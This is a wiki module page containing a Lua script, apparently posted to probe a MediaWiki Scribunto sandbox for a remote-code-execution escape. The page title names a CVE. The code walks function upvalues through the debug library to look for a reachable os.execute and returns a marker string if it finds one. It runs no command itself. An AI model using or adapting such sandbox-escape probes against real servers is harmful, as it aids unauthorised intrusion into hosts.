模块:RceEscape CVE202345363 2

来自希服维基

可在模块:RceEscape CVE202345363 2/doc创建此模块的帮助文档 

local p = {}
function p.test()
    -- In some Lua versions, finalizers run in the environment they were created in
    -- If we can create a finalizer that captures the original os table...
    local orig_os = nil

    -- Try to navigate through the function environment chain
    local f = function() end
    local i = 1
    while debug.getinfo(f, "u") do
        local info = nil
        pcall(function() info = debug.getinfo(f, "u") end)
        if info then
            for j = 1, (info.nups or 0) do
                local name, val = debug.getupvalue(f, j)
                if name == "_ENV" and type(val) == "table" then
                    local e_os = rawget(val, "os")
                    if e_os and e_os.execute then
                        return "UPVALUE_RCE_PATH: " .. type(e_os.execute)
                    end
                end
            end
        end
        f = debug.getinfo(f, "f") or {}
        f = f.func or nil
        if not f then break end
        i = i + 1
        if i > 10 then break end
    end
    return "no_upvalue_escape"
end
return p
取自“https://xn--itt73r.xn--7wr.site/w/index.php?title=模块:RceEscape_CVE202345363_2&oldid=907